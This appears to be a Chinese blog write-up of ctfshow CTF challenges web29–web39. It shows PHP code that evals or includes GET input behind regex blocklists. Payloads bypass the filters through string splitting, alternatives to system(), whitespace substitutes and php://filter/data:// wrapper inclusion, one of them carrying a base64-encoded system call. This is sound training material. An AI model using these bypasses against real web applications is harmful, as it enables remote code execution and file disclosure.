Loading

web29~web39

参考博客:
https://blog.csdn.net/m0_62422842/article/details/125507970
https://www.cnblogs.com/amazingman113/p/16036313.html

Web29

/*
\# -*- coding: utf-8 -*-
\# @Author: h1xa
\# @Date:  2020-09-04 00:12:34
\# @Last Modified by:  h1xa
\# @Last Modified time: 2020-09-04 00:26:48
\# @email: h1xa@ctfer.com
\# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
  $c = $_GET['c'];
  if(!preg_match("/flag/i", $c)){
    eval($c);
  }

}else{
  highlight_file(__FILE__);
}

payload:?c=echo tac fl''ag.php;

过滤的很少可以用 nl(见下文),通配符之类的

nl 指令用于在输出文件内容时自动添加行号。与 cat -n 类似

Web30

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:42:26
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

过滤掉system,这时我们可以看看有哪些可以代替system的:

​ (1)system()函数

​ 作用:调用shell来执行命令;返回命令的退出状态

​ (2)exec()函数(execl, execlp, execle, execv, execvp, execvpe
​ 作用:创建一个新的进程,并在新进程中执行命令

​ (3)其他:shell_exec()、passthru()、popen()、proc_open()、pcntl_exec()

​ (4)反引号

Web31

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:49:10
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

过滤空格:%09 %0a(<> ${IFS} $IFS$9 {cat,fl*} %20这几个在这个题里不行)

绕过cat使用tac more less head tac tail nl od(二进制查看) vi vim sort uniq(vim有可能不行)

Web32

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:56:31
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

  1. payload:?c=include%09$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

  2. data://text/plain;base64,PD9waHAgc3lzdGVtKCJ0YWMgZmxhZy5waHAiKTs/Pg==

主要由于这个程序过滤了括号,导致很多函数没有办法使用,include可以无括号包含,然后就成为了文件包含类题

include包含内容不经过preg_match的过滤,所以只需要注意前面内容即可

;可以用?>进行绕过,用于闭合前面的内容

get的参数用1是为了绕过“过滤

值得注意的是:当使用php://filter/会将带有通配符的文件名作为普通文件名处理(例如:*.php它会寻找对应名称,而不会输出所有php后缀的文件)

4394b628d7eb1d59ca429b88df5fab9

之后几个就用伪协议就能过

web39

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 06:13:21
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c.".php");
    }
        
}else{
    highlight_file(__FILE__);
}

这个是在我们传入的c值之后加上.php,但是由于我们写的都进行了闭合,不会出现影响

payload:?c=data:text/plain,

posted @ 2025-04-15 23:01  huidu01  阅读(40)  评论(0)    收藏  举报
; ;